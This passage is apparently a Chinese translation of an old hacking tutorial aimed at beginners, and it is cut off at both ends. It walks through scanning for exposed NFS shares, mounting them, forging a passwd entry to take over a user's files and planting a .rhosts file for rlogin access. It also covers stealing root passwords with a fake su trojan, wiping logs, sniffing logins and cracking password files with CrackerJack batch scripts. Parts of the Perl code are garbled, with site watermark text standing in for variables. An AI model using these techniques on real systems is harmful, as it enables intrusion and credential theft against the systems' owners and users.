1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT 0
----- cut here
你也可自己寫一小perl腳本程序,能自動(dòng)finger 列表中的域名并記錄響應(yīng)信息到文件中,finger完后返回并嘗試使用pop3端口,以 用戶名-用戶名(或其他信息)方式(譯注:即口令用用戶名或其他信息)登陸,記錄響應(yīng)信息到另一文件中.(這就是Emailcrk的原理)
FTP到rs.internic.net中,在域名目錄中你會(huì)找到:
com.zone.>
--------------------------------------------------------------------------------
傳輸中斷!
ov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz
Down下這些文檔,在攻擊目標(biāo)域名上運(yùn)行g(shù)etdomain.pl(下面的腳本),如:
"perl getdomain.pl com.zone com >com.all"
這條指令所做的就是解開所.com的域名并放在comm.all文檔中.
如果想解開.EDU,只需:
perl getdomain.pl edu.zone edu >edu.all
現(xiàn)在你就有了名為edu.all的域名列表供你用了
下面是perl 腳本:
getdomain.pl
---- cut here
#!/usr/bin/perl
# GetDomain By Nfin8 / Invisible Evil
# Questions /msg i-e or /msg i^e
#
# Retrieve command line arguments.
my($inputfile, $domain) = @ARGV;
usage() if (!defined($inputfile) || !defined($domain));
# Open and preprocess the input file.
open(INFILE, ";
# Initialize main data structure.
my(%hash) = {};
my($key) = "";
foreach (@lines) {
$key = (split(/\ /))[0];
chop($key);
next if ((($key =~ tr/.//) < 1) ||
(uc($domain) ne uc(((split(/\./, $key))[-1]))) ||
($key =~ m/root-server/i));
$hash ;
}
# Close input file and output data structure to STDOUT.
close(INFILE);
foreach (sort(keys(%hash))) {
print "?用戶名:@HackBase.net密?碼:
\n";
}
sub usage {
print("\n\ngetdomain:\n");
print("Usage: getdomain [inputfile] [search]\n\n");
print("Where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n");
exit(0);
}
0;
---- cut here - end of script -----
要使用上述腳本,你只需把上面幾行copy下來命名為getdomain.pl,拷貝到unix系統(tǒng)中,運(yùn)行: chmod x getdomain.pl
即可.
這時(shí)就可運(yùn)行上面所講的命令行了.
--------------------------------------------------------------------------------
使用Mount得到unix系統(tǒng)訪問權(quán)限
這并不難而且網(wǎng)絡(luò)上有很多系統(tǒng)是mountable(可共享的)的.Mount是一個(gè)unix命令允許你在遠(yuǎn)程機(jī)器驅(qū)動(dòng)器安裝系統(tǒng).這樣一來,你既可從其他機(jī)器進(jìn)行安裝過程也可僅僅共享網(wǎng)絡(luò)中的磁盤和目錄.問題在于許多管理員過于精通unix命令和設(shè)置.或者是太懶惰而把磁盤設(shè)置為全局屬性,卻不明白全局mount(連接或共享)該磁盤,別人就能獲得對(duì)他們的用戶目錄的寫權(quán)限.
開始,你需要一個(gè)hack過的root帳號(hào).為了能mount(連接或共享)遠(yuǎn)程磁盤并獲取權(quán)限,你要修改系統(tǒng)的password文檔并使用SU命令.
OK,假設(shè)我們已有root權(quán)限,讓我們開始!
可用shownmount命令顯示另一系統(tǒng)是否有mountable的磁盤.
在root帳號(hào)下:
$root> showmount -e wwa.com
ount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive
噢,這個(gè)域名不成功,OK,沒問題,找下一個(gè):
$root> showmount -e seva.net
Export list for seva.net:
/var/mail pluto.seva.net
/home/user1 pluto.seva.net
/usr/local pluto.seva.net,rover.seva.net
/export/X11R6.3 rover.seva.net
/export/rover rover.seva.net,pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone)
注意上面的“everyone”,如果我們想從這家伙里安裝linux 的話會(huì)很好.但我們是想打開用戶的目錄...所以繼續(xù)下一個(gè):
$root> showmount -e XXXXX.XXX ) {
chomp(?用戶名:@HackBase.net密?碼:
);
print "Now checking:?用戶名:@HackBase.net密?碼:
";
# Note difference in program output capture from "geturl.pl".
open (EXECFILE, "$program?用戶名:@HackBase.net密?碼:
|");
@execResult = ;
next if (!defined($execResult[0]));
if ($execResult[0] =~ /^Export/) {
print " - Export list saved.";
open (OUTFILE, ">?用戶名:@HackBase.net密?碼:
.export");
foreach (@execResult) {
print OUTFILE;
}
close (OUTFILE);
}
close(EXECFILE);
print "\n";
}
# We are done. Close all files and end the program.
close (DOMAINFILE);
0;
----------------- end of cmount.pl
OK,現(xiàn)在開始mounting(連接)磁盤.
假設(shè)我們運(yùn)行showmount -e domain.com 并返回:
Export list for domain.com:
/ (everyone)
/p1 (everyone)
/p2 (everyone)
/p3 (everyone)
/p5 (everyone)
/p6 (everyone)
/p7 (everyone)
/var/spool/mail titan,europa,galifrey
/tmp (everyone)
我們想連接(mount) / 目錄..喲呵…這家伙把整個(gè)系統(tǒng)都共享(mountable)了
$root> mkdir /tmp/mount
root> mount -nt nfs domain.com:/ /tmp/mount
如果他把home目錄設(shè)為共享(mountable)的話,命令為:
$root> mount -nt nfs domain.com:/home /tmp/mount
要umount系統(tǒng)的話,確信退出目錄然后:
$root> umount /tmp/mount
先必須確定你已創(chuàng)建了共享(mount)目錄(你可在系統(tǒng)任何地方創(chuàng)建).如果系統(tǒng)的/mnt目錄是空的,你也可用它.
OK,下面動(dòng)真格了:
bash# ls -al /mnt ; 確定/mnt是空的
ls: /mnt: No such file or directory ; 不存在這樣的文件或目錄 ;)
bash# mkdir /mnt ; 讓我們?yōu)樗ㄒ粋€(gè)(/mnt目錄)
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; 開始 mount 這小家伙 ...
bash# cd /mnt ; 進(jìn)入mounted的目錄.
bash# ls ; 簡(jiǎn)單的dir ..
TT_DB home raddb share
back local radius-961029.gz www
exec lost found radius-961029.ps
bash# ; the home dir就在那了 ... oh 很好...
bash# cd home
bash# ls -l ; 列長(zhǎng)目錄... 這兒tom 看起來不錯(cuò) ;)
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 302 other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 viewx
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash# ; 注意到tom 是 302號(hào)使用者 ... hmmm 把他放進(jìn)我們的passwd 文檔中.
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash ; 搞定 ;)
bash# su - tom ; su 到 tom 帳號(hào) ...
bash$ ls -l
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 tom other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 view
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash$ ; 注意上面,toms 的用戶號(hào)沒有了... 現(xiàn)在我們擁有了他的目錄!
bash$ echo >>tom/.rhosts ; 在tom的目錄里建一個(gè)名為 .rhosts 的文檔
(bash$ ;在.rhosts中加入 號(hào),每個(gè)人都能用rlogin到他的帳戶。)
bash$ rlogin xxxxx.xxx 在我們的機(jī)器上我們是tom了 , 因此rlogin 上平臺(tái).
Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx
Sun Microsystems Inc. SunOS 5.5 Generic November 1995
> 雅皮士們 ,我們進(jìn)去了!
> ls -al
total 8
drwxr-xr-x 2 tom group 512 Mar 1 17:10 .
drwxr-xr-x 14 tom group 512 Jan 24 11:16 ..
-rw-r--r-- 1 tom group 144 Dec 30 15:32 .profile
-rw-r--r-- 1 tom bin 8 Mar 11 08:26 .rhosts
>
現(xiàn)在我們有了訪問權(quán)限了,可以開始hack這個(gè)系統(tǒng)了.哦,這該是下一課了,先輕松一下吧。
破解(Cracking)passwrd 文檔
與新手交談
困難的方法
利用mount命令獲取訪問權(quán)限
有很多方法可以獲得一個(gè)起始帳號(hào).我將深入每個(gè)方面幫助你開始.你所需的只是一個(gè)好的帳號(hào),用來獲得數(shù)百個(gè)帳號(hào).想一想這:你進(jìn)入一個(gè)很好的可以利用的系統(tǒng)(大多是Linux機(jī)器;),奪取root權(quán)限并裝上一個(gè)Sniffer(嗅探器);這個(gè)TCP sniffer 將監(jiān)測(cè)到網(wǎng)絡(luò)上任何login(登陸)過程并記錄下所有Telnet,F(xiàn)tp或撥號(hào)進(jìn)出的Login 名和口令;這樣即使是一個(gè)小以太網(wǎng)你也可獲得大約100個(gè)口令,如果是一個(gè)更大的網(wǎng)絡(luò)供應(yīng)商你就會(huì)得到全世界的數(shù)百個(gè)帳號(hào)!這一切,你只要有某個(gè)可利用系統(tǒng)的一個(gè)好帳號(hào)和口令就可做到!如果你看起來無法利用某系統(tǒng)的root權(quán)限,那就拿它來破解口令,用來和那些但沒有shell帳號(hào)或磁盤空間的其他hacker及IRC使用者交換.決不要把一個(gè)你有root權(quán)限的系統(tǒng)的口令給出去!你自己留著它!
OK,讓我們開始深入獲取你的第一個(gè)帳號(hào)的方法.Go!
--------------------------------------------------------------------------------
破解passwd 文檔
如果你是按照心中正確的框架去hacking的話,一般都是先運(yùn)行破解程序直到得到一個(gè)可以進(jìn)入此系統(tǒng)的好帳號(hào).然后Login上去看看能否奪取系統(tǒng)的root權(quán)限.如果可以,拿了root,移取用得著的文檔到你的子目錄里,抹去你的在場(chǎng)痕跡,清除所有日志.這樣就準(zhǔn)備好可以安裝Sniffer了.
為何要去破解那些只用24小時(shí)就可破解出大部分口令的系統(tǒng)?我們的目的不僅僅是正在hack的機(jī)器,還有那些與之相連的機(jī)器.如果某系統(tǒng)沒有利用價(jià)值,不要在它上面浪費(fèi)時(shí)間,去尋找下一個(gè)目標(biāo).后注:如果你僅僅是為了得到上面所說的交換帳號(hào)的口令那又另當(dāng)別論.
得到一個(gè)管理員的帳號(hào)后,你可能會(huì)想讀一讀他的歷史文檔,看看他是否曾用過SU命令成為root.如果有,你就可以用SU特洛伊木馬幫你奪取root口令.它如此工作:你更改他(管理員)的Shell腳本使得一隱藏目錄(.term)被很好安置在搜尋路徑里所有目錄之前.把偽SU程序放在該.term(或其他)目錄里.他鍵下SU,對(duì)他來說一切都如常,在提示下他鍵入root口令,然后口令就悄悄地被拷貝到/tmp/.elm69的log文檔里,同時(shí)刪除偽SU文件,并返回一個(gè)摽諏畬頂?shù)男畔⒆屗僭囈淮危芾韱T一定認(rèn)為是他輸入錯(cuò)了,便再次運(yùn)行SU,但這回是真的SU了.
在后面的uuencode過的附錄里,你可找到假SU程序.
這是DOC文檔:
Fake SU by Nfin8 - i-e
IRC: /msg i-e
Easy as 1,2,3 ...
1.更改路徑到你已有訪問權(quán)限的用戶帳號(hào)上,此前你應(yīng)已從歷史文檔中看到他曾用過SU命令;先建立放SU特洛伊程序的目錄.最好是.term或.elm.
2.確定已編輯過su.c的頭部指向你所用路徑,使得SU特洛伊可自我刪除并在第二次嘗試讓真SU程序運(yùn)行.
3.把所有文件放進(jìn)目標(biāo)目錄,并編譯su.c.
gcc su.c -o su
然后刪除SU以外的所有文件.一切搞定!
.bash_profile 結(jié)構(gòu)如下:
# .bash_profile
# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
# User specific environment and startup programs
PATH=$PATH:$HOME/bin
ENV=$HOME/.bashrc
USERNAME=""
export USERNAME ENV PATH
把第一行改為:PATH=$HOME/.term:$PATH:$HOME/bin
當(dāng)系統(tǒng)管理員運(yùn)行SU時(shí),就會(huì)先運(yùn)行在.term里的SU特洛伊然后報(bào)告口令出錯(cuò).SU特洛伊程序會(huì)在/tmp目錄創(chuàng)建包含鍵入的root口令(或帳戶口令)的隱藏文件.如果是非root帳戶,它還記錄帳戶名.然后SU特洛伊自我刪除使得下次嘗試將運(yùn)行真正的SU程序.
你可在/etc目錄下的passwd文檔前部找到管理員的用戶名.只需打:more passwd
你可確信passwd文檔的頭一二個(gè)帳戶就是管理員的,雖然有時(shí)你也能找到其他人的目錄如/staff/username.
歷史文檔在每個(gè)用戶目錄里.通過閱讀它們,你可看到該用戶最近使用過的命令,有時(shí)能看到最近的100多個(gè)命令.尋找.bash_history或history文件,你可用more命令讀它們:more .bash_history,也可:more .b*或more .b(然后按鍵盤上的Tab鍵).
OK,現(xiàn)在你需要一個(gè)好的password破解程序.下一章你可看到在沒有帳號(hào)時(shí)如何從系統(tǒng)奪取password文檔.但是it is catch 22(我不懂了?:譯者),你還是要用到password破解程序.
你需要下列三樣?xùn)|東:
1. Password破解程序
2. 好的字典檔
3. Password 文檔
初學(xué)者最好的password破解程序當(dāng)數(shù)Crackerjack,搜尋Web頁(yè)可以很容易找到它.Down下來準(zhǔn)備開始.如果你已有所入門,可down一個(gè)unix版本的Cjack并在shell環(huán)境下運(yùn)行它.但如你是初學(xué),down一個(gè)DOS/OS/2版本好了.
此外還要找一些好字典檔.最好的字典檔就是名字(names)了.你會(huì)在網(wǎng)絡(luò)上發(fā)現(xiàn)最不可靠的口令如男孩的女友名,女孩的男友名啦:)象如'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords'’ hackersdict’這樣為名的字典檔是最好的.
裝載crackerjack如:[D:\jack]jack
Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark
PWfile(s) : domain.com.passwd
Wordfile : domain.com.passwd
上面把password文檔作為字典檔.這會(huì)讓你先找出那些用登陸名(Login name)作口令的用戶,如果用真名(real name )或公司名之類的信息的話,也能馬上猜中.這樣你就不用苦苦等候程序搜索整個(gè)字典檔了.
如果想hash(我譯做:擴(kuò)充)字典檔以得到更多的詞量,可參讀crackerjack的DOC文檔.
所謂hashing(擴(kuò)充)就是你可告訴crackerjack更改字典檔中的詞例如在單詞的前后加一些數(shù)字或字母,就象sandy1或1sandy.你會(huì)發(fā)現(xiàn)很多用戶這樣做并以為這更可靠.
下面就是為口令文檔和字典檔寫的hashing文件.通過觀察它們,你就會(huì)明白你如何修改它們或創(chuàng)建新的hashing文件以滿足自己的需要.
------------ start of dicthash.bat
@echo off
cls
echo - THIS FILE FOR DOS MACHINES
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your dict and
echo - password file. Then use this batch file using the following format:
echo -
echo - dicthash.bat dictfilename.ext passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - dicthash will first load jack running the dict file against your
echo - password file in both cases, then it will add numbers 0-9 both to
echo - the begining and end of every dict word. This will take a while,
echo - so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)
jpp -lower %1 | jack -stdin %2
jpp %1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
---------------- end of dicthash.bat
---------------- start of jackhash.bat
@echo off
cls
echo - THIS FILE FOR DOS
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your password file.
echo - Then use this batch file using the following format:
echo -
echo - jackhash.bat passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - jackhash will first load jack running the passwd file against
echo - itself in both upper and lower cases, then it will add numbers 0-9
echo - both to the begining and end of every dict word. This will take
echo - a while, so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)
jpp -gecos:5 -lower %1 | jack -stdin %1
jpp -gecos:5 %1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
